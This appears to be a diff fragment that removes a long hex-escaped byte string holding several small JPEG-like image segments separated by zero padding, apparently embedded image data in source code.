-"\xff\x00\xce\x8b\x0e\xec\x89\xe6\x8a\x36\x45\x79\x11\x59\xce\x14" -"\x13\x8d\xc7\xda\x86\x9a\x25\x95\x62\x69\x10\x3b\xe4\xaa\x93\xc9" -"\xc7\x5c\x54\xbf\xd9\xb6\xff\x00\xed\xfe\x74\x9f\xd9\x96\xe4\x82" -"\x77\x64\x74\xe6\x95\x82\xec\x8f\xce\x8b\xce\xf2\x7c\xc5\xf3\x36" -"\xee\xd9\x9e\x71\xeb\x8a\x04\xd1\x34\xad\x12\xc8\x86\x45\x00\xb2" -"\x03\xc8\x07\xa6\x45\x49\xfd\x99\x6f\x9c\xfc\xd9\xf5\xcd\x2f\xf6" -"\x6d\xbf\xfb\x7f\x9d\x3b\x05\xd9\x72\x8a\x28\xa0\x41\x45\x14\x50" -"\x01\x45\x14\x50\x01\x45\x14\x50\x00\xff\xd9\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40" -"\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c" -"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xab\x5d\x4e\xce\xf1" -"\xa2\x5b\x79\x4b\x99\xa1\xf3\xd3\xe4\x61\x94\xce\x33\xc8\xe3\x93" -"\xd3\xad\x5b\xa2\x8a\x00\x86\xea\x51\x0d\xb3\xc8\x51\xdc\x0c\x0c" -"\x20\xc9\xe4\xe3\xa7\xe3\x55\xea\xc5\xdc\x8d\x15\xb3\xba\x44\xd3" -"\x37\x03\x62\xf5\x39\x38\xff\x00\xeb\xd4\x07\xad\x26\x34\x25\x1e" -"\x67\x94\xc8\xdb\x1d\xf2\xe1\x70\x83\x24\x64\xe3\x3f\x4f\x5a\x28" -"\xde\xf1\xba\x18\xe2\x32\x12\xe1\x48\x07\x18\x04\xe0\x9f\xc3\xad" -"\x0b\x71\xbd\x8b\xd4\x51\x45\x32\x4a\x2f\x97\x91\x24\x2e\xe0\xa6" -"\x70\x03\x10\x0e\x7d\x47\x7f\xc6\x82\x09\x9c\x4d\xbd\xf7\x05\xda" -"\x06\xe3\xb7\x1f\x4e\x99\xf7\xa2\x8a\x57\x2a\xc8\x4c\x1f\x39\xa5" -"\xde\xf9\x65\xda\x41\x63\xb7\x1f\x4e\x94\xb4\x51\x48\x2c\x14\xa0" -"\x90\x72\x0e\x0d\x25\x14\x0c\x48\x57\xc8\x42\xb1\xb3\xe1\x98\xb1" -"\xdc\xc5\x8e\x4f\xb9\xa4\x44\xd9\x6f\xe4\x2b\x3e\xcc\x11\xcb\x92" -"\x79\xf7\x27\x34\xea\x29\xdd\x8a\xc8\x62\x4d\x14\x8e\xe8\x92\x23" -"\x34\x67\x0e\x01\xc9\x53\xef\x44\x73\x45\x2e\xef\x2a\x45\x7d\xac" -"\x55\xb6\x9c\xe0\x8e\xd5\x2f\xf6\x6d\xbf\xfb\x7f\x9d\x1f\xd9\xb6" -"\xe3\xa6\xff\x00\xce\x9d\x85\x76\x45\x1c\xf0\xc9\x17\x9b\x1c\xa8" -"\xf1\xf3\xf3\x2b\x02\x38\xeb\xcd\x20\xb8\x80\xc1\xe7\x89\x90\xc3" 
-"\x8d\xde\x60\x6f\x97\x1e\xb9\xa9\xbf\xb3\x6d\xc7\x4d\xff\x00\x9d" -"\x27\xf6\x65\xbe\x31\xf3\xe3\xd3\x34\x59\x0a\xec\x89\xe7\x85\x21" -"\xf3\x9e\x54\x58\xb1\x9d\xe5\x86\x31\xf5\xa5\x92\x68\xa2\x50\xd2" -"\x48\x88\xa4\x80\x0b\x1c\x9a\x9e\x82\xa5\xfe\xcd\xb7\xc6\x3e\x7c" -"\x7d\x68\xfe\xcd\xb7\x3d\x77\xfe\x74\x59\x0e\xec\x89\xe6\x8a\x32" -"\xa2\x49\x15\x4b\x9d\xaa\x09\xc6\xe3\xe8\x28\x69\xa2\x49\x12\x37" -"\x91\x15\xdf\x3b\x54\x9e\x5b\x1d\x70\x2a\x5f\xec\xdb\x7f\xf6\xff" -"\x00\x3a\x3f\xb3\x6d\xff\x00\xdb\xfc\xe8\xb0\x5d\x97\x28\xa2\x8a" -"\x04\x14\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x00\xff\xd9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0" -"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4" -"\xaf\xed\x2b\x4d\xfb\x7c\xd3\x9f\x3f\xec\xff\x00\x71\xbf\xd6\x63" -"\x38\xe9\xe9\xdf\xa5\x4b\x69\x75\x0d\xe5\xba\xcf\x6e\xfb\xe3\x62" -"\x40\x3b\x48\xe8\x48\x3c\x1f\x71\x53\x51\x40\x05\x14\x51\x40\x1c" -"\xbc\x17\x57\xd3\x6a\xa2\xca\xce\x58\x2c\xe3\x92\xe2\xe8\xca\xe9" -"\x0a\xee\x3b\x0a\x60\x8e\xdb\xbe\x6e\x49\x06\x98\xb7\x17\x57\x3a" -"\x96\x8f\x73\x24\xe5\x9e\x2f\xb5\x23\xaa\x20\xfd\xe1\x43\xb7\x3e" -"\xc4\xed\xed\x5d\x2a\x5a\xdb\xa4\xbe\x6a\x41\x1a\xbe\x58\xee\x0a" -"\x33\x96\xc6\xef\xcf\x03\x3f\x4a\x16\xd6\xdd\x19\x19\x20\x8d\x4a" -"\x16\x2a\x42\x81\xb4\xb1\xcb\x63\xeb\xde\x80\x39\x8d\x3b\x57\xd6" -"\x66\x8e\xce\xf6\x65\x3e\x55\xe7\x25\x18\xc2\x23\x50\x54\x9f\x90" -"\x86\x2c\x48\xc7\x43\xd7\x9e\x05\x42\xfa\xb5\xfd\xa5\xa5\xbd\xfc" -"\x9e\x45\xcd\xdc\xda\x68\x98\x39\x8d\x57\x61\x67\x8c\x63\x3c\x7c" -"\x83\x76\x4e\x4f\x6e\xa2\xba\x88\xf4\xbd\x3e\x2b\xa7\xb9\x8a\xca" -"\x04\x99\xf3\xb9\xd5\x00\x27\x3d\x7f\x3e\xfe\xb5\x20\xb3\xb5\x01" -"\x40\xb7\x8b\x0b\x1f\x92\x06\xc1\xc2\x7f\x77\xe9\xc0\xe2\x80\x2b" -"\x32\x06\xb6\xfb\x39\x69\x3c\xbd\xbb\x78\x72\x1b\x1f\xef\x67\x3f" 
-"\x8e\x69\x65\x5f\x36\x11\x13\xb3\xed\xe3\xa3\x90\x78\xf7\x1c\xd2" -"\xd1\x4a\xec\xab\x21\x25\x1e\x76\xcd\xec\xff\x00\x23\x06\x1b\x5c" -"\xaf\x23\xd7\x1d\x7e\x86\x95\xc1\x79\x11\xd9\x9f\x74\x64\x95\xc3" -"\x10\x3f\x10\x3a\xfe\x34\x51\x45\xd8\x59\x08\xcb\xba\x74\x98\xb3" -"\xef\x40\x40\xf9\x8e\x39\xf6\xe8\x69\x70\x7c\xff\x00\x3b\x73\xef" -"\xdb\xb7\xef\x1c\x63\xe9\xd3\xf1\xa2\x8a\x2e\xc2\xc8\x45\x05\x66" -"\x79\x43\x3e\xe7\xc6\x72\xc4\x8e\x3d\x07\x41\xf8\x51\x18\xf2\x9e" -"\x46\x46\x7c\xc8\x72\xd9\x62\x7f\x2c\xf4\xfc\x29\x68\xa2\xec\x2c" -"\x86\x79\xd1\x09\x44\x5e\x62\x79\x84\x6e\x09\x9e\x71\xeb\x8a\x04" -"\xd1\x19\x5a\x21\x22\x19\x14\x02\x53\x3c\x81\xeb\x8a\x97\xfb\x36" -"\xdf\x39\xf9\xff\x00\x3a\x3f\xb3\x6d\xff\x00\xdb\xfc\xe8\xb0\xae" -"\xc8\x92\x68\x9d\xdd\x12\x44\x66\x4c\x06\x50\x79\x5c\xfa\xd1\x1c" -"\xd1\x48\x58\x47\x22\xb9\x46\xda\xdb\x4e\x70\x7d\x0d\x4b\xfd\x9b" -"\x6f\xfe\xdf\xe7\x47\xf6\x6d\xbf\xfb\x7f\x9d\x3b\x05\xd9\x14\x73" -"\x45\x2a\x6f\x8a\x54\x75\xc9\x1b\x95\xb2\x32\x3a\xd2\x2d\xc4\x2d" -"\x07\x9e\xb3\x46\x62\xc6\x77\x86\x1b\x71\xf5\xa9\xbf\xb3\x6d\xff" -"\x00\xdb\xfc\xe9\x06\x99\x6e\x06\x06\xe0\x3d\x33\x45\x90\xae\xc8" -"\x8d\xc4\x22\x0f\x3c\xca\x82\x2c\x6e\xde\x5b\x8c\x7a\xe6\x96\x49" -"\xe1\x8a\x31\x24\xb2\xa2\x21\x20\x06\x66\xc0\xe7\xa5\x4b\xfd\x9b" -"\x6f\x8c\x7c\xf8\xfa\xd1\xfd\x9b\x6e\x7a\xef\xfc\xe8\xb2\x0b\xb2" -"\xe5\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40" -"\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff" -"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" -"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" -"\x3f\x00\xea\xee\x35\x5d\x5e\xc6\x2b\x91\x3e\xe0\x12\x15\x94\x3c" -"\xfe\x50\x75\xf9\xd5\x49\xda\x8c\x7e\x5c\x13\xc9\x1c\x63\xa9\xed" -"\x6b\x59\xd4\xef\x61\xd4\xda\xd2\xd2\x58\xe3\x05\x6d\x80\x66\x5d" -"\xdb\x4c\x93\x14\x3f\xf8\xe8\xe0\x56\xad\xb6\x99\x61\x69\x1c\x89" 
-"\x6d\x67\x04\x6b\x28\xc4\x81\x50\x7c\xc3\xd0\xfa\x8f\x6a\x2d\xf4" -"\xbb\x0b\x68\xcc\x76\xf6\x70\xc6\xa5\xc3\x90\xa8\x3e\xf0\xe8\x7f" -"\x0c\x71\x40\x16\x23\x56\x48\x95\x5d\xcc\x8c\x00\x05\x88\x00\xb1" -"\xf5\xe2\x9f\x45\x14\x00\x51\x45\x14\x00\xd9\x1b\x64\x6c\xfb\x4b" -"\x6d\x04\xe0\x75\x35\x8d\xa5\xcf\x7b\x77\x69\x65\xa9\x49\xa9\x43" -"\xe5\xdc\x80\xe6\x01\x18\xdb\xf3\x0f\xb8\xa7\x39\xdc\x3d\x4e\x7a" -"\x1e\x07\x6d\xba\xa7\x1e\x95\xa7\xc7\x78\x6e\xe3\xb2\x81\x6e\x09" -"\x2d\xe6\x04\x19\xc9\xea\x7e\xa7\xd6\x80\x19\x08\xf2\x55\x82\x33" -"\x61\x98\xb1\xdc\xc5\xb9\x3f\x5a\x23\x5f\x2e\x0f\x25\x59\xf6\x73" -"\xf7\x9c\x93\xcf\xb9\x39\xa5\xa2\x95\xd9\x56\x43\x4c\x60\xda\xfd" -"\x98\xb4\x9e\x5e\xdd\xbf\x7d\xb7\x63\xfd\xec\xe7\xf1\xcd\x2c\x8b" -"\xe6\x41\xe4\xb3\x3e\xce\x3e\xeb\x90\x78\xf7\x07\x34\xb4\x51\x76" -"\x16\x42\x4a\x3c\xe5\x55\x76\x7c\x2b\x06\x1b\x58\xaf\x23\xe9\x44" -"\x83\xcd\x78\xd9\xd9\xf3\x1b\x6e\x5c\x31\x03\x3e\xe0\x75\xfc\x69" -"\x68\xa2\xec\x2c\x84\x60\x5a\x64\x94\xb3\xee\x4c\xe3\x0c\x40\xe7" -"\xd4\x74\x3f\x8d\x2e\x0f\x9f\xe7\x6e\x7d\xfb\x76\xfd\xe3\x8c\x7d" -"\x3a\x7e\x34\x51\x45\xd8\x59\x0c\x92\x58\xa3\x2a\x24\x91\x10\xbb" -"\x6d\x5d\xc7\x19\x3e\x82\x86\x9a\x24\x74\x47\x91\x15\xdf\x3b\x54" -"\x9e\x5b\xe9\x52\xff\x00\x66\xdb\x9e\xbb\xff\x00\x3a\x3f\xb3\x6d" -"\xff\x00\xdb\xfc\xe9\xd8\x57\x64\x46\x68\x84\xab\x11\x91\x04\x8c" -"\x09\x08\x4f\x24\x7a\xe2\x81\x34\x46\x63\x17\x98\x9e\x60\x5d\xc5" -"\x33\xce\x3d\x71\x52\xff\x00\x66\xdb\xe7\x3f\x3f\xe7\x49\xfd\x99" -"\x6f\x9c\xfc\xd9\xf5\xcd\x2b\x05\xd9\x1a\xcd\x13\x48\xd1\xac\x88" -"\x5d\x31\xb9\x41\xe5\x73\xd3\x34\x24\xb1\x48\xcc\x23\x91\x18\xa1" -"\xc3\x00\x73\xb4\xfa\x1a\x97\xfb\x36\xdf\xfd\xbf\xce\x8f\xec\xdb" -"\x7f\xf6\xff\x00\x3a\x2c\x17\x64\x51\xcd\x14\xaa\x5a\x29\x51\xd4" -"\x12\xa4\xab\x67\x04\x75\x14\x89\x3c\x32\x43\xe7\x24\xc8\xd1\x63" -"\x3b\xc3\x71\x8f\xad\x4d\xfd\x9b\x6e\x3a\x6f\xfc\xe8\x1a\x6d\xb8" -"\xe9\xbf\xf3\xa7\x64\x17\x65\xca\x28\xa2\x81\x05\x14\x51\x40\x05" 
-"\x14\x51\x40\x05\x14\x51\x40\x00\xff\xd9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" -"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" -"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xec\xff\x00\xb5\x27\x9f\x46" -"\xd2\x9d\xa4\x8c\xbd\xec\x6f\xe7\x60\x75\xc4\x2c\xc7\x1e\x9f\x30" -"\x15\x97\x65\x3d\xcd\x85\x9c\xf7\xb0\xdc\x7d\xcd\x2e\xcb\xe4\x28" -"\xb8\x50\x49\x04\x93\xd7\x81\xbb\xf3\xf6\xae\xae\x2d\x2e\xc2\x1b" -"\x99\x6e\x22\xb3\x81\x25\x94\x10\xee\xa8\x01\x6c\xf5\xfc\xfb\xfa" -"\xd4\x89\x69\x6c\x88\x51\x2d\xe2\x0a\xd1\x88\x88\x08\x30\x50\x67" -"\x0b\xf4\x19\x3c\x7b\xd0\x06\x36\xb5\xa9\xdf\x43\xaa\x1b\x4b\x39" -"\x51\x14\x8b\x61\xb8\xa8\x6d\xa6\x49\x4a\x93\xff\x00\x7c\x8e\x2a" -"\x9d\xd6\xa9\xac\x79\xfa\x81\xb7\x2e\x13\x4f\x61\x18\x2c\x21\x08" -"\xe4\x20\x62\xd2\x16\x60\x40\x39\xfe\x10\x30\x39\xe7\xa5\x74\x16" -"\xfa\x5e\x9f\x6d\x1f\x97\x05\x9c\x11\xae\xf1\x26\x02\x0f\xbc\x3a" -"\x1f\xa8\xed\xe9\x4b\x71\xa6\x58\x5c\xdc\xad\xc5\xc5\x3d\x32\xcc" -"\xb8\xc3\xb2\x02\x78\xe9\xf5\xc7\x6f\x4a\x00\xb1\x13\x33\xc2\x8e" -"\xeb\xb1\x99\x41\x2b\x9c\xe0\xfa\x67\xbd\x3e\x8a\x28\x00\xa2\x8a" -"\x28\x02\x82\x8d\xb3\xb4\xc1\x9f\x7b\x80\x0f\xcc\x71\xc7\xb7\x41" -"\x44\x63\xcb\x92\x49\x15\x9f\x74\x84\x16\xcb\x12\x3a\x63\x80\x7a" -"\x7e\x14\xb4\x52\xbb\x2a\xc8\x48\x87\x93\xbf\x63\x3f\xce\xc5\x8e" -"\xe7\x2d\xc9\xf4\xcf\x4f\xa0\xa2\x25\xf2\xa2\x31\x23\x3e\xd3\x9e" -"\xae\x49\xe7\xdc\xf3\x4b\x45\x17\x61\x64\x35\x63\x09\x6b\xf6\x75" -"\x67\x11\xed\xdb\xf7\xce\x71\xfe\xf6\x73\xfa\xd0\xe9\xbe\xdf\xc8" -"\x66\x7d\x98\x03\x87\x20\xf1\xee\x0e\x69\xd4\x51\x76\x16\x42\x4c" -"\xbe\x72\x05\x76\x7c\x02\x18\x6d\x72\xa7\x23\xdc\x51\x28\xf3\x59" -"\x0b\xb3\x65\x1b\x72\xe1\x88\xe7\xdf\x1d\x7f\x1a\x5a\x28\xbb\x0b" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0" 
-"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5" -"\x04\x12\x87\xcb\xba\x15\xf4\x0b\x8f\xeb\x52\x55\x1c\x0c\x63\x1c" -"\x63\x1f\x85\x2e\x33\x9f\x7e\xb4\xae\x3b\x15\x7f\xb2\xae\x8c\x7b" -"\x5a\xf1\x8f\xcf\xbb\x19\x38\x18\x20\x8c\x0f\x6c\x54\x67\x4a\xd4" -"\x9a\x16\x56\xd4\x9c\x3e\x3e\x56\xc9\x6c\x1f\x5c\x55\xec\x73\xf8" -"\xe7\xf1\xa0\x0c\x11\x8e\xc7\x22\x8b\x85\x8a\xa3\x4f\xd4\x44\x5e" -"\x5f\xdb\x98\x02\x72\x49\x72\x4a\xe3\x3c\x67\x03\x3f\x5a\xd7\x18" -"\x03\x19\xe9\x54\x40\x00\x00\x06\x00\x18\x14\x60\x7e\x98\xfc\x28" -"\xb8\x58\xbd\x55\xae\x61\x9d\xee\x23\x78\xe4\xc2\x0e\x19\x77\x11" -"\xdf\xaf\x1d\x7e\x95\x19\x00\xe7\x3d\xfa\xd1\x8e\x73\xef\x9f\xc6" -"\x8b\x85\x84\xf2\xae\xb3\xf7\x23\xeb\xfd\xee\xd4\x08\xae\xb8\xca" -"\x47\xef\xcd\x5f\xa2\x98\x8a\x1e\x55\xdf\xf7\x23\xe9\xeb\xde\x83" -"\x15\xde\x38\x48\xf3\x8f\x5e\xf5\x7e\x8a\x00\xa0\x62\xba\xe7\x09" -"\x1f\xb7\xcd\x47\x95\x77\xfd\xc8\xfa\xff\x00\x7b\xb5\x5f\xa2\x80" -"\x28\x08\xae\xb8\xca\x47\xf9\xd0\x22\xbb\xe3\x29\x1f\x4e\x79\xab" -"\xf4\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45" -"\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45" -"\x14\x50\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" -"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" -"\x11\x00\x3f\x00\xee\xce\x95\x7b\x24\x91\xcb\x2d\xd8\xf3\x23\x5d" -"\xaa\xc0\x9e\xb8\xc6\x7f\x1a\x74\x9a\x7e\xa5\x26\xe6\xfb\x7b\x23" -"\x33\x67\x6a\xb9\xc0\x18\x3c\x0a\xb5\x8e\x73\xef\x9f\xc6\x80\x00" -"\xc6\x3b\x52\xb8\xec\x5c\x40\x42\x00\x4e\x48\x1c\x9f\x5a\x5a\xa3" -"\x81\x8c\x7b\x63\xf0\xa5\x20\x1c\xe7\xbf\x5a\x2e\x16\x2d\x48\x25" -"\x24\x79\x6e\xaa\x3b\xe5\x73\x4f\x1d\x06\x4f\x35\x4b\x1c\xe7\xdf" -"\x3f\x8d\x00\x63\xa7\xae\x7f\x1a\x2e\x16\x24\xb8\xc7\x9c\x0f\xcb" 
-"\x9d\xbf\x8d\x52\xbe\x03\x62\x64\x0e\x1b\xbf\x5e\x9d\xaa\xc8\x00" -"\x22\x33\x71\x00\x83\xcf\x33\x20\x87\x1b\xbc\xc2\xdf\x2e\x3d\x73" -"\x4b\x24\xf0\xc5\x17\x9b\x24\xa8\x91\xf1\xf3\x13\xc7\x3d\x2a\x4f" -"\xec\xcb\x7c\x63\xe6\xc7\xa6\x69\x4e\x9b\x6e\x7a\xef\xfc\xe9\xd9" -"\x13\x76\x45\x24\xd1\x44\x14\xcb\x22\x20\x66\x0a\x37\x1c\x64\x9e" -"\xd4\x3c\xd1\x46\xe8\x8f\x22\x2b\x39\xc2\x02\x70\x58\xfb\x54\xbf" -"\xd9\xb6\xff\x00\xed\xfe\x74\x7f\x66\xdb\xff\x00\xb7\xf9\xd1\x61" -"\xdd\x91\x19\x62\x12\xac\x4d\x22\x09\x18\x12\xaa\x4f\x24\x0a\x3c" -"\xe8\xbc\xef\x27\xcc\x4f\x37\x6e\xed\x99\xe7\x1e\xb8\xa9\x7f\xb3" -"\x6d\xf3\x9f\x9f\xf3\xa3\xfb\x36\xdf\x39\xf9\xf3\xf5\xa5\x60\xbb" -"\x22\x59\xa2\x69\x1a\x35\x91\x0b\xa6\x37\x28\x3c\x8c\xf4\xcd\x09" -"\x34\x52\x33\xac\x72\x23\x32\x1c\x30\x07\x25\x4f\xa1\xa9\x7f\xb3" -"\x6d\xf3\x9f\x9f\xf3\xa3\xfb\x36\xdf\xfd\xbf\xce\x8b\x05\xd9\x72" -"\x8a\x28\xa6\x20\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xa2\x8a\x28\x00" -"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf5\x42\x70\x32\x7a\x0a\xa0\x35\xad\x38\xdb\xf9\xe2\x73\xe5" -"\xfd\x9f\xed\x3b\xbc\xb6\xff\x00\x57\xeb\xd3\xf4\xeb\x5a\x14\x50" -"\x02\x29\x0c\xa1\x87\x42\x32\x29\x68\xa2\x80\x22\xb9\x48\xe4\xb6" -"\x95\x27\xc7\x94\xc8\x43\xe4\xe0\x63\x1c\xf3\x55\x86\x36\x8c\x74" -"\xc7\x15\x66\xe4\xc4\x2d\x65\x37\x1b\x7c\x90\x84\xc9\xbf\xa6\xdc" -"\x73\x9f\x6c\x55\x55\x20\xa8\x2b\xd3\x1c\x7d\x28\x63\x5b\x8b\x59" -"\xb3\xa4\x69\x73\x29\x8f\xab\xb6\xe7\xe7\x3f\x36\x07\xe5\xd0\x71" -"\x5a\x55\x9b\x30\x84\x5c\xcd\xe4\xed\xce\xef\xde\x6d\xfe\xf6\x07" -"\x5f\x7c\x62\x92\x09\x1a\x2e\x37\xcd\x1c\xac\xcf\xba\x3c\xed\xc3" -"\x90\x39\xf5\x1d\x0f\xe3\x4a\x41\x33\x89\xb7\x3e\xf0\xbb\x7e\xf1" -"\xc6\x3e\x9d\x28\xa2\x8b\xb1\xd9\x08\x17\x17\x0d\x38\x67\xde\xca" 
-"\x14\xfc\xc7\x18\xfa\x74\xa5\x40\x52\x59\x24\x56\x7d\xd2\x63\x76" -"\x58\x91\xc7\xa0\x3c\x0f\xc2\x8a\x28\xbb\x0b\x21\x11\x76\x09\x00" -"\x2c\x44\x84\xb3\x06\x62\xc3\x9f\xaf\x41\xed\x4b\x45\x14\x82\xd6" -"\x0a\xcd\x99\xe2\x7b\xa9\x84\x58\xca\xb6\xd7\xc0\xc7\xcd\x81\xf9" -"\xf1\x8a\xd2\xac\xe9\xe4\x12\x5c\xca\x02\xb0\xd8\xdb\x49\x61\x8c" -"\xf0\x0e\x47\xa8\xe6\x9a\x14\x8b\xd1\xcd\x14\xa1\x8c\x52\x23\x85" -"\x62\xa7\x69\xce\x08\xea\x29\x12\x78\x64\x8b\xcd\x8e\x54\x68\xf9" -"\xf9\xc3\x02\x38\xeb\xcd\x4d\xfd\x9b\x6e\x3a\x6f\xfc\xe8\xfe\xcd" -"\xb7\xff\x00\x6f\xf3\xa7\x64\x2b\xb2\x11\x71\x09\x83\xcf\x13\x21" -"\x87\x1b\xbc\xc0\xc3\x6e\x3d\x73\x44\x97\x10\x47\x07\x9d\x24\xc8" -"\xb1\x60\x1d\xe5\x86\x39\xe9\xcd\x4b\xfd\x99\x6f\x8c\x7c\xd8\xf4" -"\xcd\x1f\xd9\x96\xf8\xc7\xcd\x8f\x4c\xd1\x64\x17\x64\x72\x4d\x14" -"\x4a\x1a\x59\x11\x01\x20\x02\xc7\x19\x27\xa0\xa1\xe6\x8a\x36\x45" -"\x92\x44\x42\xe7\x6a\x86\x38\xdc\x7d\x05\x4b\xfd\x9b\x6f\xfe\xdf" -"\xe7\x47\xf6\x6d\xbf\xfb\x7f\x9d\x2b\x0e\xec\x88\xcb\x12\xca\x91" -"\x34\x88\x1d\xf3\xb5\x49\xe4\xe3\xae\x2a\x8c\xf2\x17\xb9\x90\x32" -"\x32\xed\x6d\xa0\x9f\xe2\x18\x1c\x8f\x6f\xf0\xad\x3f\xec\xdb\x7f" -"\xf6\xff\x00\x3a\x3f\xb3\x60\xf5\x7f\xce\x98\xb5\x2e\x51\x45\x14" -"\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\xff\xd9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x74\xaa\xd7\xdf\x71\x39\x1d\x7d\x28\xea\x1d\x0b\x1e\x55\xde\x3e" -"\xe4\x79\xc7\xaf\x7a\x0c\x57\x7c\xe1\x23\xf6\xe6\xaf\xd1\x4c\x45" -"\x0f\x2a\xeb\xfb\x91\xf5\xfe\xf7\x6a\x3c\xab\xac\x8c\xa4\x7d\x79" -"\xf9\xaa\xfd\x14\x01\x40\x45\x77\x81\x94\x8f\xa7\x3c\xd1\xe5\x5d" -"\xe3\xee\x47\x9c\x7a\xf7\xab\xf4\x50\x05\x03\x15\xdf\x38\x48\xfd" -"\xb9\xa8\xe6\xb5\xba\x95\x71\xb5\x40\x07\x38\x07\xad\x69\xd1\x40" -"\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40" -"\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40" -"\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 